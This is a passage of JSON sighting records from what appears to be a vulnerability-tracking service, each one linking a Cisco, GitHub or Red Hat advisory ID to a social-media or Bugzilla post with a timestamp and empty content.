"2024-12-17T06:41:51.391411Z"}, {"uuid": "0f6d6a75-56cb-4808-b5c6-15981ee6d0c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180815-dna", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794594506389", "content": "", "creation_timestamp": "2024-12-17T06:41:51.691613Z"}, {"uuid": "5b57b0e3-9136-44a2-bcd3-3e742df436bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190123-sdwan", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794578777652", "content": "", "creation_timestamp": "2024-12-17T06:41:51.752655Z"}, {"uuid": "50ee8a65-598a-4b37-afd9-f11b4189a9ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180221-psc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794659106612", "content": "", "creation_timestamp": "2024-12-17T06:41:52.482443Z"}, {"uuid": "1bd36fd1-4590-4ed8-b135-cffd20d50990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180815-sb", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794711920304", "content": "", "creation_timestamp": "2024-12-17T06:41:52.826901Z"}, {"uuid": "2e0f7ea0-1e63-4fa2-87c8-d8975ae8031f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180606-cuc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794720949130", "content": "", "creation_timestamp": "2024-12-17T06:41:53.085470Z"}, {"uuid": "5a17399a-6ccc-4e3e-9e64-071daf72c437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794772176758", "content": "", "creation_timestamp": "2024-12-17T06:41:53.206858Z"}, {"uuid": "3a348c88-bd3b-465d-8049-c326df1df161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191002-asa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794800923528", "content": "", "creation_timestamp": "2024-12-17T06:41:53.263495Z"}, {"uuid": "f10eb92d-7210-464e-944a-d4238458da65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180328-ike", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794819865194", "content": "", "creation_timestamp": "2024-12-17T06:41:53.531867Z"}, {"uuid": "2a9a1b46-b1a6-47f6-af4d-0c24dbe44139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191002-fmc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794861122824", "content": "", "creation_timestamp": "2024-12-17T06:41:53.724327Z"}, {"uuid": "6dcb3fa1-ad55-46ec-8a3f-e5c5ff0a865c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180801-sb", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794553755267", "content": "", "creation_timestamp": "2024-12-17T06:41:51.449185Z"}, {"uuid": "f88da4d1-4e69-4f6b-a184-2ccb534851b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190828-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794583304274", "content": "", "creation_timestamp": "2024-12-17T06:41:51.875302Z"}, {"uuid": "c941188f-7d14-4a4a-bac3-b5fac05b9661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200219-dcnm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794605366674", "content": "", "creation_timestamp": "2024-12-17T06:41:51.936442Z"}, {"uuid": "e0612e36-2319-470f-8801-c5d1eff38301", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxosldap", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794632028669", "content": "", "creation_timestamp": "2024-12-17T06:41:52.257742Z"}, {"uuid": "ad48d558-4409-4e4a-a5a2-73617d85b979", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fg7-vxc8-qx5w", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3ldoyum6vh72m", "content": "", "creation_timestamp": "2024-12-19T23:15:37.172677Z"}, {"uuid": "800e8ea8-1665-43b0-9a9f-ff67261168d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190220-cuc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794667440514", "content": "", "creation_timestamp": "2024-12-17T06:41:52.609638Z"}, {"uuid": "e6b4b8c5-dcc4-4c91-8f6b-c2984e0a4eb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-675w-hf2m-qwmj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675448907156149", "content": "", "creation_timestamp": "2024-12-18T19:21:37.134059Z"}, {"uuid": "17f97ca4-5f44-4257-95a9-45dd8d38e171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v8rf-pvgm-xxf2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681106505075065", "content": "", "creation_timestamp": "2024-12-19T19:20:25.043009Z"}, {"uuid": "8f95289f-887d-4e0e-bbfe-5bca42b70ee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqw6-rr3v-8fff", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681106522415587", "content": "", "creation_timestamp": "2024-12-19T19:20:25.495554Z"}, {"uuid": "356cf50e-2906-4aac-8a54-ec92037dcc64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3v4-v2rp-hfm9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681106537514551", "content": "", "creation_timestamp": "2024-12-19T19:20:25.577022Z"}, {"uuid": "1bde8147-4756-4a88-add2-d26d3cd71493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v8rf-pvgm-xxf2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681119402600838", "content": "", "creation_timestamp": "2024-12-19T19:23:41.882784Z"}, {"uuid": "57a0d17f-9492-4fbb-962c-0a3ad3edb4c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqw6-rr3v-8fff", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681119418009728", "content": "", "creation_timestamp": "2024-12-19T19:23:42.188172Z"}, {"uuid": "54627045-4358-43c6-b09d-4e67bdb42883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3v4-v2rp-hfm9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681119432889668", "content": "", "creation_timestamp": "2024-12-19T19:23:42.565889Z"}, {"uuid": "c5b1f2b0-bd71-4c40-b748-332b00ef81f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3q97-vjpp-c8rp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686930684976106", "content": "", "creation_timestamp": "2024-12-20T20:01:34.966660Z"}, {"uuid": "9001fb59-e3ef-43ae-94b7-3828e0e6c95c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-vpcdi", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794689674992", "content": "", "creation_timestamp": "2024-12-17T06:41:52.755503Z"}, {"uuid": "e4382a14-3658-47e5-a694-06dcb15d88e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-spa112", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794694478137", "content": "", "creation_timestamp": "2024-12-17T06:41:52.887182Z"}, {"uuid": "55ff4f48-d4d4-47dd-a432-bcd14a18139d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m2gq-69fp-6hv4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675448878441837", "content": "", "creation_timestamp": "2024-12-18T19:21:36.573443Z"}, {"uuid": "74f5cc7f-1e02-46eb-8cda-8080189792e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-567m-82f6-56rv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681119447478911", "content": "", "creation_timestamp": "2024-12-19T19:23:42.635481Z"}, {"uuid": "0d1a93b4-52b4-4bc4-af58-0f025b78367b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49w6-73cw-chjr", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3ldoxyjy6jt2d", "content": "", "creation_timestamp": "2024-12-19T22:59:54.501083Z"}, {"uuid": "6e38321e-a1c2-4c2e-83da-b391f81dac16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h2c9-7j2r-m98p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686962967680123", "content": "", "creation_timestamp": "2024-12-20T20:09:47.604719Z"}, {"uuid": "bf92bab8-1135-4cbf-8614-7fff9d83c870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180110-ucm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794725782259", "content": "", "creation_timestamp": "2024-12-17T06:41:53.010323Z"}, {"uuid": "0c8c0eaa-c8e9-4a29-94bc-1872447369fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-iosxr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794762644663", "content": "", "creation_timestamp": "2024-12-17T06:41:53.141214Z"}, {"uuid": "6df6424e-8bd6-48d3-a7d9-e712d6d39ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2p6p-9rc9-62j9", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113677310750656920", "content": "", "creation_timestamp": "2024-12-19T03:15:06.824140Z"}, {"uuid": "1dc41819-e99a-4287-8d71-4d27d8ffb4f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190501-fabric", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794783383554", "content": "", "creation_timestamp": "2024-12-17T06:41:53.387856Z"}, {"uuid": "0a2c9c44-d07f-44fe-a30a-d9fe3ed21e49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191016-sbss", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794879725183", "content": "", "creation_timestamp": "2024-12-17T06:41:53.828771Z"}, {"uuid": "b20aefcf-1db5-4b60-89fe-a62904dae1e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h8r-gq97-xv69", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675448892829570", "content": "", "creation_timestamp": "2024-12-18T19:21:36.841096Z"}, {"uuid": "43a8151b-3f57-477d-b7a3-e40ae86e9df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vh22-6c6h-rm8q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113822745975140566", "content": "", "creation_timestamp": "2025-01-13T19:41:12.526286Z"}, {"uuid": "ec402fac-474b-4e98-b503-3e9ba9ae5d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wppx-qmqh-9h33", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113822772296271638", "content": "", "creation_timestamp": "2025-01-13T19:47:53.937145Z"}, {"uuid": "5e5fc591-28a7-4bfa-8227-67a9a0cd6fe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wmg4-jqx5-4h9v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782677525284582", "content": "", "creation_timestamp": "2025-01-06T17:51:15.851077Z"}, {"uuid": "9146fe85-901c-4064-897c-859bf3d60b68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h2mv-7gg8-8x7v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782699139664116", "content": "", "creation_timestamp": "2025-01-06T17:56:45.701607Z"}, {"uuid": "4da50523-836b-49ea-8a57-cd072054d06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p883-7496-x35p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113822794348210157", "content": "", "creation_timestamp": "2025-01-13T19:53:29.933049Z"}, {"uuid": "de9ca1fe-109b-46e5-aa6b-0f52a653888f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9q22-w64p-g8qm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113822816616033754", "content": "", "creation_timestamp": "2025-01-13T19:59:09.895465Z"}, {"uuid": "0b4ef51d-c752-4550-91d3-a1f350ae61c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5wxh-3p65-r4g6", "type": "seen", "source": "https://bsky.app/profile/MastodonEngineering.mastodon.social.ap.brid.gy/post/3lfu6sc5qhjp2", "content": "", "creation_timestamp": "2025-01-16T11:35:28.664116Z"}, {"uuid": "8de89c3a-a3e0-42cc-a6f3-865bb296a060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-96w4-jqwf-qx2j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782729492440784", "content": "", "creation_timestamp": "2025-01-06T18:04:28.840840Z"}, {"uuid": "2e2d250e-e949-4bb2-8230-c9903420bd50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pv74-hcg9-65r4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113822983361272164", "content": "", "creation_timestamp": "2025-01-13T20:41:34.108444Z"}, {"uuid": "e7303adb-297b-4e88-baae-1710d3da4a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69wr-vhwg-84h2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113782763860609034", "content": "", "creation_timestamp": "2025-01-06T18:13:13.394005Z"}, {"uuid": "86f6607c-72f8-4abb-ac59-cc371dda5d05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5rgf-26wj-48v8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823005501409680", "content": "", "creation_timestamp": "2025-01-13T20:47:14.555725Z"}, {"uuid": "5757c634-b7c6-4165-888e-d7ee5103f3b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5rgf-26wj-48v8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113823016558641219", "content": "", "creation_timestamp": "2025-01-13T20:50:01.314492Z"}, {"uuid": "57342513-818c-4e10-8ef2-720ebfb9fa4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r5vf-wf4h-82gg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113787873626385330", "content": "", "creation_timestamp": "2025-01-07T15:52:42.185339Z"}, {"uuid": "0cda249a-a78d-4817-bb09-91f2054df03b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://bugzilla.redhat.com/show_bug.cgi?id=2328846", "content": "", "creation_timestamp": "2024-11-16T15:59:00.000000Z"}, {"uuid": "c9b919bc-a16c-4964-b41a-77a737a0a007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x52f-h5g4-8qv5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721140557456523", "content": "", "creation_timestamp": "2024-12-26T21:01:36.235303Z"}, {"uuid": "4b029ec9-35cd-4442-826c-c36815fcd99a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wwxw-64g6-2992", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721264829675461", "content": "", "creation_timestamp": "2024-12-26T21:33:12.585961Z"}, {"uuid": "de2d93e9-b4a3-4f2d-b8f6-0f6aca65894e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42mm-c8x3-g5q6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721289101442411", "content": "", "creation_timestamp": "2024-12-26T21:39:22.917752Z"}, {"uuid": "92a8d802-fa46-46d5-8a2f-20bbd3cd81de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fw42-79gw-7qr9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721313115109242", "content": "", "creation_timestamp": "2024-12-26T21:45:29.288668Z"}, {"uuid": "4f6a1bbc-4e4e-4e94-ae67-0b78106b5584", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jx33-9jc7-24gc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721360939391914", "content": "", "creation_timestamp": "2024-12-26T21:57:39.140430Z"}, {"uuid": "107eb05c-540e-4f7a-aee2-d5ee4956178b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx95-62h6-h7v3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113721385324840578", "content": "", "creation_timestamp": "2024-12-26T22:03:51.185242Z"}, {"uuid": "b1db5aa4-05d5-4d6e-9cf1-d0ffb9916c4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rjwx-p44f-mcrv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793626161781850", "content": "", "creation_timestamp": "2025-01-08T16:15:38.761471Z"}, {"uuid": "39a30ef8-eff3-43a7-9e61-fcef0b626856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rfq8-j7rh-8hf2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589996255229449", "content": "", "creation_timestamp": "2024-12-03T17:09:53.124967Z"}, {"uuid": "9f2d52f4-050f-4bff-8fdd-042b84323a41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mw6c-f428-jx4f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567773997038518", "content": "", "creation_timestamp": "2024-11-29T18:58:28.269916Z"}, {"uuid": "e2fc39ee-aa54-426d-a219-459347ec6533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmc2-jpr5-7rg9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567774025902212", "content": "", "creation_timestamp": "2024-11-29T18:58:28.656851Z"}, {"uuid": "6a3bc545-ee95-4aa1-a6e2-06a300f5920d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m435-9v6r-v5f6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589627910748026", "content": "", "creation_timestamp": "2024-12-03T15:36:12.724198Z"}, {"uuid": "c65fe713-625d-4aaa-85cf-bca4210b3363", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcxm-7wvp-g6p5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113595269145037059", "content": "", "creation_timestamp": "2024-12-04T15:30:51.099001Z"}, {"uuid": "ea0ae079-4015-4cd6-9a42-8e626ff8aa70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qw6r-qh9v-638v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113601319926430730", "content": "", "creation_timestamp": "2024-12-05T17:09:38.570897Z"}, {"uuid": "4a2c4e06-cc44-4f73-913d-a2a995b44662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-hm36-w32w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113595307922783526", "content": "", "creation_timestamp": "2024-12-04T15:40:42.695766Z"}, {"uuid": "0a31c8c1-13e3-4b0d-9686-27225fe84273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh33-46q4-hwm2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113551135091689384", "content": "", "creation_timestamp": "2024-11-26T20:26:58.709017Z"}, {"uuid": "c2ca81e2-11f1-4d1e-b7da-f0157b672a51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h35g-vwh6-m678", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113525173597889873", "content": "", "creation_timestamp": "2024-11-22T06:24:37.734916Z"}, {"uuid": "116cba15-a7fa-452c-88d8-800029f3ad03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rxv5-gxqc-xx8g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113585337918937417", "content": "", "creation_timestamp": "2024-12-02T21:25:12.665580Z"}, {"uuid": "0eca5b59-d457-43b3-9b1b-bd1abdc190a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4mhg-xv73-xq2x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589996225770721", "content": "", "creation_timestamp": "2024-12-03T17:09:52.672254Z"}, {"uuid": "ce05aa06-735f-4597-95a9-e2ef0e53bd9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r977-prxv-hc43", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113535421553290812", "content": "", "creation_timestamp": "2024-11-24T01:50:49.160275Z"}, {"uuid": "5e29563f-4d04-4090-80ac-845d7eb01129", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqwr-j9mm-fhw6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545092236832008", "content": "", "creation_timestamp": "2024-11-25T18:50:11.997522Z"}, {"uuid": "b1919eac-6c1e-4b6e-a190-2bdef10eda3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqxx-pfmh-h43g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113557057129821106", "content": "", "creation_timestamp": "2024-11-27T21:33:02.869596Z"}, {"uuid": "47990c31-bb23-4e06-a2df-0a080eef5e80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jwcm-9g39-pmcw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113557057144002750", "content": "", "creation_timestamp": "2024-11-27T21:33:02.971893Z"}, {"uuid": "d46a6b4c-e5b8-44a9-996f-1c0bc359685c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55v3-xh23-96gh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113557116144398643", "content": "", "creation_timestamp": "2024-11-27T21:48:02.337695Z"}, {"uuid": "b17d7b57-d631-4c63-a2f3-8ffb0785041d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fgrf-2886-4q7m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522034732012121", "content": "", "creation_timestamp": "2024-11-21T17:06:22.695355Z"}, {"uuid": 